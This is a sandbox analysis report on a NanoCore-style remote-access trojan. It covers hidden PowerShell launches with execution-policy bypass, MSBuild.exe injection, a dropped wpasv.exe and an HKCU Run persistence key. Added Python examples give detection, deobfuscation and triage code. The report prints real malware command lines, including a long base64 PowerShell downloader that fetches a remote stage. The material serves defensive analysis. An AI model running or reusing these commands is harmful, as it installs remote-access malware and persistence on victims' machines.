Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e [base64-encoded command omitted]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy bypass /e 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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e 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; }else{ exit;}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
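The process tree recorded above (cmd.exe starts powershell.exe, which re-launches powershell.exe with an encoded payload and then starts MSBuild.exe) is the part of this report that converts most directly into detection rules. The Python below is an added example, not part of the Joe Sandbox report: it runs constructed Sysmon-style process-creation events (Image, ParentImage, CommandLine), modelled on the lines above, through rules for the indicators the report records: an -EncodedCommand/-e/-ec or /e switch followed by base64 that decodes as UTF-16LE text, switches typed in mangled case such as -noNinteRacTi and /nOp (powershell.exe accepts any unambiguous prefix of a switch, so these resolve to -NonInteractive and -NoProfile), a hidden window requested with -win 1 (1 is ProcessWindowStyle.Hidden), a backtick inside the command line, PowerShell spawning PowerShell, and MSBuild.exe started by PowerShell. The base64 blob in the sample events is a constructed placeholder, not the report's payload; the two benign control events and the "<unknown>" parent are invented.

```python
"""
Detection rules for the cmd.exe -> powershell.exe -> powershell.exe ->
MSBuild.exe chain in this report, exercised on constructed Sysmon-style
process-creation events. The events mirror the report's process tree but
are not its data; the base64 blob is a placeholder, not the real payload.
"""
import base64
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # path of the created process
    parent_image: str   # path of the process that created it
    command_line: str


POWERSHELL = {"powershell.exe", "pwsh.exe"}

# powershell.exe switches in their documented casing. The parser accepts any
# unambiguous prefix, so -noNinteRacTi is -NonInteractive and /nOp is
# -NoProfile; Ep and Ec are explicit short aliases.
SWITCHES = ["NoProfile", "NoLogo", "NonInteractive", "NoExit", "ExecutionPolicy",
            "Ep", "WindowStyle", "EncodedCommand", "Ec", "Command", "File",
            "Version", "Sta", "Mta", "InputFormat", "OutputFormat",
            "PSConsoleFile", "WorkingDirectory"]


def _prefixes(word: str) -> str:
    """Regex alternation of every prefix of word, longest first."""
    return "|".join(word[:n] for n in range(len(word), 0, -1))


_TOKEN = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\b")
_ENC = re.compile(rf"(?:^|\s)[-/](?:{_prefixes('encodedcommand')}|ec)\s+([A-Za-z0-9+/=]{{16,}})", re.I)
_HIDDEN = re.compile(rf"(?:^|\s)[-/](?:{_prefixes('windowstyle')})\s+(?:1|hidden)\b", re.I)


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _decode_utf16_b64(blob: str):
    """The decoded script if blob is base64 over UTF-16LE text, else None."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def mangled_switches(cmd: str) -> List[str]:
    """Switch tokens whose casing is neither lower, UPPER nor the documented
    prefix of a known switch: -nolOgO, -noNinteRacTi, -eP, /nOp."""
    out = []
    for tok in _TOKEN.findall(cmd):
        canon = [s for s in SWITCHES if s.lower().startswith(tok.lower())]
        if canon and not (tok.islower() or tok.isupper()
                          or any(tok == s[:len(tok)] for s in canon)):
            out.append(tok)
    return out


def analyze(ev: ProcessEvent) -> List[str]:
    """Reasons an event matches the report's chain; empty means none."""
    image, parent, cmd = _base(ev.image), _base(ev.parent_image), ev.command_line
    hits = []
    if image in POWERSHELL:
        m = _ENC.search(cmd)
        if m:
            script = _decode_utf16_b64(m.group(1))
            hits.append("encoded command" if script is None
                        else f"encoded command starting {script[:24]!r}")
        mangled = mangled_switches(cmd)
        if len(mangled) >= 2:
            hits.append("case-mangled switches: " + " ".join(mangled))
        if _HIDDEN.search(cmd):
            hits.append("hidden window requested")
        if "`" in cmd:
            hits.append("backtick token splitting in command line")
        if parent in POWERSHELL:
            hits.append("PowerShell launched by PowerShell")
    if image == "msbuild.exe" and parent in POWERSHELL:
        hits.append("MSBuild.exe launched by PowerShell")
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
PAYLOAD = base64.b64encode("$check = 1".encode("utf-16-le")).decode("ascii")  # placeholder blob

EVENTS = [
    # Stage 1 as started from cmd.exe: mangled switches and a nested /e launch.
    ProcessEvent(PS, r"C:\Windows\System32\cmd.exe",
                 "powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi "
                 "$check=Get-Process output -ErrorAction SilentlyContinue;"
                 "if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO "
                 "-win 1 -noNinteRacTi /e " + PAYLOAD + "; }else{ exit;}"),
    # Stage 2: PowerShell re-launching itself with the encoded payload.
    ProcessEvent(PS, PS, "powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e " + PAYLOAD),
    # Stage 3: MSBuild.exe started by PowerShell as the injection host.
    ProcessEvent(MSBUILD, PS, "MSBuild.exe"),
    # Controls: an administrator's script and a Visual Studio build.
    ProcessEvent(PS, r"C:\Windows\explorer.exe",
                 r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"),
    ProcessEvent(MSBUILD, r"C:\Program Files\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe",
                 "MSBuild.exe build.proj"),
    # The launcher form the report lists with an unknown parent.
    ProcessEvent(PS, "<unknown>", "powershell.exe -NoProfile -windowstyle hidden -ExecutionPolicy Bypass "
                 "PowERsHELl.`ExE -ExecutionPolicy bypass /e " + PAYLOAD),
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(_base(ev.parent_image), "->", _base(ev.image), analyze(ev) or "clean")
```

The casing check deliberately compares against the documented switch spelling rather than flagging every mixed-case token, so -ExecutionPolicy and -NoProfile pass while -nolOgO does not; the two controls produce no hits, which is the property to keep when tuning the thresholds.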
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\GgNhpv.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Users\user\Desktop\GgNhpv.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
PE file contains a COM descriptor data directory
Source: GgNhpv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: GgNhpv.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: wpasv.exe, wpasv.exe.15.dr
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256 source: GgNhpv.exe, 00000000.00000003.797888702.000000001B03D000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: GgNhpv.exe, 00000000.00000003.797888702.000000001B03D000.00000004.00000001.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.dr
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: 15.2.MSBuild.exe.400000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 15.2.MSBuild.exe.400000.0.unpack, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -windowstyle hidden -ExecutionPolicy Bypass PowERsHELl.`ExE -ExecutionPolicy bypass /e JAByAGUAZwAgAD0AIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAGMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuADsASQBmACAAKAAkAHIAZQBnACAALQBNAGEAdABjAGgAIAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAVwBpAG4AZABvAHcAcwAgADEAMAAnACkAIAB7ACQAZAB0AD0AIAAoAFsARABhAHQAZQBUAGkAbQBlAF0AOgA6AE4AbwB3ACkAOwAkAGQAdQByAGEAdABpAG8AbgAgAD0AIAAkAGQAdAAuAEEAZABkAFkAZQBhAHIAcwAoADIANQApACAALQAkAGQAdAA7ACQAYQBjAHQAaQBvAG4AIAAgACAAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBjAG0AZAAuAGUAeABlACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ARQBwACAAQgB5AFAAYQBzAHMAIAAtAHcAaQBuACAAMQAgAC8AbgBvAFAAIAAtAG4AbwBsAE8AZwBPACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgACQAYwBoAGUAYwBrAD0ARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAbwB1AHQAcAB1AHQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBpAGYAIAAoACQAYwBoAGUAYwBrACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsAIAAgAFAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AZQBQACAAQgBZAFAAYQBzAFMAIAAvAG4ATwBwACAALQBuAG8AbABPAGcATwAgAC0AdwBpAG4AIAAxACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgAC8AZQAgAEoAQQBCAHkAQQBHAFUAQQBaAHcAQQBnAEEARAAwAEEASQBBAEEAbwBBAEMAYwBBAGUAdwBBAHkAQQBIADAAQQBlAHcAQQB3AEEASAAwAEEAZQB3AEEAeABBAEgAMABBAGUAdwBBAHoAQQBIADAAQQBKAHcAQQB0AEEARwBZAEEASgB3AEIAawBBAEYATQBBAGQAQQBBAG4AQQBDAHcAQQBKAHcAQgB5AEEARwBrAEEAYgBnAEEAbgBBAEMAdwBBAEgAQwBCAGcAQQBFAFEAQQBZAEEAQgB2AEEARwBBAEEAZAB3AEIAdQBBAEcAQQBBAGIAQQBCAGcAQQBHADgAQQBZAFEAQQBkAEkAQwB3AEEASgB3AEIAbgBBAEMAYwBBAEsAUQBBADcAQQBGAHMAQQBkAGcAQgB2AEEARwBrAEEAWgBBAEIAZABBAEMAQQBBAFcAdwBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAFoAUQBCAG0AQQBHAHcAQQBaAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAEIAQQBIAE0AQQBjAHcAQgBsAEEARwAwAEEAWQBnAEIAcwBBAEgAawBBAFgAUQBBADYAQQBEA
G8AQQBUAEEAQgB2AEEARwBFAEEAWgBBAEIAWABBAEcAawBBAGQAQQBCAG8AQQBGAEEAQQBZAFEAQgB5AEEASABRAEEAYQBRAEIAaABBAEcAdwBBAFQAZwBCAGgAQQBHADAAQQBaAFEAQQBvAEEAQwBjAEEAVABRAEIAcABBAEcATQBBAGMAZwBCAHYAQQBIAE0AQQBiAHcAQgBtAEEASABRAEEATABnAEIAVwBBAEcAawBBAGMAdwBCADEAQQBHAEUAQQBiAEEAQgBDAEEARwBFAEEAYwB3AEIAcABBAEcATQBBAEoAdwBBAHAAQQBEAHMAQQBKAEEAQgBtAEEARwBvAEEAUABRAEIAYgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEMANABBAFYAZwBCAHAAQQBIAE0AQQBkAFEAQgBoAEEARwB3AEEAUQBnAEIAaABBAEgATQBBAGEAUQBCAGoAQQBDADQAQQBTAFEAQgB1AEEASABRAEEAWgBRAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgAwAEEATwBnAEEANgBBAEUATQBBAFkAUQBCAHMAQQBHAHcAQQBRAGcAQgA1AEEARwA0AEEAWQBRAEIAdABBAEcAVQBBAEsAQQBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVAB3AEIAaQBBAEcAbwBBAFoAUQBCAGoAQQBIAFEAQQBJAEEAQQBjAEkARwBBAEEAVABnAEIAZwBBAEcAVQBBAFkAQQBCAFUAQQBHAEEAQQBMAGcAQgBnAEEARgBjAEEAWQBBAEIAbABBAEcAQQBBAFEAZwBCAGcAQQBFAE0AQQBZAEEAQgBzAEEARwBBAEEAYQBRAEIAZwBBAEcAVQBBAFkAQQBCAE8AQQBHAEEAQQBWAEEAQQBkAEkAQwBrAEEATABBAEEAawBBAEgASQBBAFoAUQBCAG4AQQBDAHcAQQBXA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -windowstyle hidden -ExecutionPolicy Bypass PowERsHELl.`ExE -ExecutionPolicy bypass /e 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
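The /e payloads quoted in this report can be decoded offline. The Python below is an added example, not part of the report: it decodes the base64 (UTF-16LE text; any '=' padding a report has trimmed is restored) and then statically resolves the string-building tricks the decoded payload relies on: the curly quotes U+201C/U+201D, which the PowerShell tokenizer accepts as double quotes; identifiers split with backticks ("`N`e`T`.`W`e`B`C`l`i`e`N`T"); the '{2}{0}{1}{3}' -f reordering that assembles the method name handed to [Microsoft.VisualBasic.Interaction]::CallByName on a New-Object Net.WebClient; and the 'htt'+[Char]80+[Char]58 concatenation of the paste.ee URLs, after which the downloaded bytes go to a [k.Hackitup]::exe('MSBuild.exe', $f) call consistent with the MSBuild.exe processes in the tree. Backtick escapes follow Windows PowerShell (the \WindowsPowerShell\v1.0\ interpreter the report shows), where `n inside a double-quoted string is a newline and `e is a plain e. The script embedded in the block is constructed to mirror the payload's shape, uses the host example.invalid, and is not the report's blob.

```python
"""
Deobfuscation helpers for the PowerShell payloads in this report: the
-EncodedCommand (/e) base64 over UTF-16LE, curly quotes used as string
delimiters, backtick-split identifiers ("`N`e`T`.`W`e`B`C`l`i`e`N`T"),
'{2}{0}{1}{3}' -f reordering and [Char]N concatenation.
"""
import base64
import re

# Windows PowerShell 5.1 escapes inside double-quoted strings. Any other
# character after a backtick stands for itself, which is what `D`o`w relies
# on. (PowerShell 7 adds `e for ESC; the report's interpreter is 5.1.)
_BACKTICK = {"0": "\0", "a": "\a", "b": "\b", "f": "\f", "n": "\n",
             "r": "\r", "t": "\t", "v": "\v", "`": "`"}

# The tokenizer treats these Unicode quotes exactly like ASCII quotes.
_QUOTES = {0x201C: '"', 0x201D: '"', 0x201E: '"',
           0x2018: "'", 0x2019: "'", 0x201A: "'", 0x201B: "'"}

_SQ = r"'(?:[^']|'')*'"                      # single-quoted literal (verbatim)
_DQ = r'"(?:[^"`]|`.)*"'                     # double-quoted literal (escapes)
_STR = re.compile(f"({_SQ})|({_DQ})", re.S)
_CHAR = re.compile(r"\[char\]\s*(\d+)", re.I)
_FMT = re.compile(rf"\(\s*({_SQ})\s*-f\s*({_SQ}(?:\s*,\s*{_SQ})*)\s*\)", re.I)
_CAT = re.compile(rf"({_SQ})\s*\+\s*({_SQ})")


def decode_encoded_command(blob: str) -> str:
    """/e and -EncodedCommand take base64 of UTF-16LE text. Restore any
    '=' padding that was lost when the blob was copied into a report."""
    blob = re.sub(r"\s+", "", blob)
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


def _val(tok: str) -> str:
    """Literal value of a single-quoted token ('' is an escaped quote)."""
    return tok[1:-1].replace("''", "'")


def _lit(value: str) -> str:
    return "'" + value.replace("'", "''") + "'"


def resolve_strings(script: str) -> str:
    """Fold curly quotes to ASCII, then apply backtick escapes inside
    double-quoted literals and re-emit them single-quoted. Literals that
    contain '$' are left alone: they would be variable-expanded at run time,
    so a static rewrite cannot know their value."""
    def fix(m):
        if m.group(1) or "$" in m.group(2):
            return m.group(0)
        body = re.sub(r"`(.)", lambda e: _BACKTICK.get(e.group(1), e.group(1)),
                      m.group(2)[1:-1], flags=re.S)
        return _lit(body)
    return _STR.sub(fix, script.translate(_QUOTES))


def _fmt(m):
    template = _val(m.group(1))
    if not re.fullmatch(r"(?:\{\d+\})+", template):
        return m.group(0)          # not a pure reordering template
    args = [_val(t) for t in re.findall(_SQ, m.group(2))]
    try:
        return _lit(template.format(*args))
    except IndexError:
        return m.group(0)


def deobfuscate(encoded: str) -> str:
    """Decode the blob and statically resolve the string-building tricks.
    Network fetches (DownloadString) and .Replace() on fetched data stay as
    written; they need the second stage, which is not on disk."""
    s = resolve_strings(decode_encoded_command(encoded))
    s = _CHAR.sub(lambda m: _lit(chr(int(m.group(1)))), s)
    s = _FMT.sub(_fmt, s)
    prev = None
    while prev != s:               # merge 'a'+'b'+'c' pairwise until stable
        prev, s = s, _CAT.sub(lambda m: _lit(_val(m.group(1)) + _val(m.group(2))), s)
    return s


# Constructed sample in the same shape as the report's payload (not the
# report's own blob): the host is example.invalid and the stage is fake.
SAMPLE_SCRIPT = (
    "$reg = ('{2}{0}{1}' -f 'Str','ing',\u201c`D`o`wn`l`oa`d\u201d);"
    "[void][System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');"
    "[Microsoft.VisualBasic.Interaction]::CallByName((New-Object "
    "\u201c`N`e`T`.`W`e`B`C`l`i`e`N`T\u201d),$reg,"
    "[Microsoft.VisualBasic.CallType]::Method,"
    "'htt'+[Char]80+'s'+[Char]58+'//example.invalid/stage2')|IEX"
)
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_ENCODED))
```

Because the escape table is applied faithfully, a backtick before n inside a double-quoted string comes out as a newline rather than the letter; that is what PowerShell itself does, so the resolved output shows the method name exactly as the interpreter would build it.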
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\GgNhpv.exe | Code function: 0_2_00007FF7F9A4BA21 push ebp; iretd 0_2_00007FF7F9A4BAB8
Source: C:\Users\user\Desktop\GgNhpv.exe | Code function: 0_2_00007FF7F9A4B724 push ebp; iretd 0_2_00007FF7F9A4BAB8
Source: C:\Users\user\Desktop\GgNhpv.exe | Code function: 0_2_00007FF7F9A4B448 push eax; retf 0_2_00007FF7F9A4B461
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_02B2A20C push FFFFFF8Bh; iretd 15_2_02B2A1CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_02B269FA push esp; retf 15_2_02B26A01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_02B269F8 pushad ; retf 15_2_02B269F9
Binary may include packed or encrypted code
Source: initial sample | Static PE information: section name: .text entropy: 7.546914296
.NET source code contains many randomly named methods
Source: 15.2.MSBuild.exe.400000.0.unpack, #=qJT4I5hOweIk$xYFEeDszbikglXCuquUd$v9AXtyq2ns=.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 15.2.MSBuild.exe.400000.0.unpack, #=qWrm21vQ8CBMZP_RBTwpusA==.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File created: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe

Boot Survival:

Creates an autostart registry key
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WPA Service
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WPA Service
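A Run value named like a Windows service but registered under HKCU is a common shape for user-level persistence, and a single indicator (an executable under AppData, say) is too noisy on its own because legitimate software autostarts from there too. The Python below is an added example, not part of the report: it scores constructed Run entries with several weak indicators (executable in a user-writable location, a GUID-named directory such as the 59407D34-... folder the report shows the dropped wpasv.exe in, and a service-like value name registered per user) so that the report's entry raises all three while an ordinary AppData-resident program raises one. That the "WPA Service" value's data points at the dropped wpasv.exe is an assumption; the report shows the value name and the dropped file, not the value data. The other two entries and the environment map are invented.

```python
"""
Multi-indicator triage of HKCU Run entries, run over constructed values.
The "WPA Service" data is assumed to point at the dropped wpasv.exe; the
report shows the value name and the dropped file, not the value data.
"""
import re
from typing import Dict, List, Tuple

# Constructed environment for %VAR% expansion; real code reads the user's.
ENV: Dict[str, str] = {"windir": r"C:\Windows",
                       "appdata": r"C:\Users\user\AppData\Roaming",
                       "localappdata": r"C:\Users\user\AppData\Local"}
WRITABLE_DIRS = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\temp\\")
SERVICE_WORDS = ("service", "svc", "host", "updater")
GUID = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)


def expand(data: str) -> str:
    """Expand %VAR% references using the constructed environment."""
    return re.sub(r"%(\w+)%", lambda m: ENV.get(m.group(1).lower(), m.group(0)), data)


def executable_of(data: str) -> str:
    """Path of the program a Run value launches: the quoted first token, or
    everything up to the first .exe when the path is unquoted."""
    data = expand(data).strip()
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    m = re.match(r"(.+?\.exe)(?=\s|$)", data, re.I)
    return m.group(1) if m else data.split(" ")[0]


def triage(name: str, data: str) -> List[str]:
    """Indicators raised by one Run entry; two or more deserve a look."""
    exe = executable_of(data)
    low = exe.lower()
    flags = []
    if any(d in low for d in WRITABLE_DIRS):
        flags.append("executable in a user-writable location (profile or temp)")
    if GUID.search(exe):
        flags.append("GUID-named directory in path")
    if any(w in name.lower() for w in SERVICE_WORDS):
        flags.append("service-like name registered per user (HKCU Run)")
    return flags


def verdict(flags: List[str]) -> str:
    return "review" if len(flags) >= 2 else "ok"


# Constructed Run entries: the first mirrors the report, the other two are
# ordinary Windows and OneDrive autostarts included as controls.
RUN_ENTRIES: List[Tuple[str, str]] = [
    ("WPA Service",
     r'"C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe"'),
    ("OneDrive", r'"%LOCALAPPDATA%\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
]

if __name__ == "__main__":
    for name, data in RUN_ENTRIES:
        flags = triage(name, data)
        print(f"{verdict(flags):6} {name}: {'; '.join(flags) or 'no indicators'}")
```

The threshold of two indicators is the tunable part: OneDrive legitimately runs from AppData\Local and raises exactly one flag, which is why a rule that alerts on the profile path alone would page on every workstation.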

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe:Zone.Identifier read attributes | delete
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\GgNhpv.exe | Process information set: NOOPENFILEERRORBOX (42 identical events)
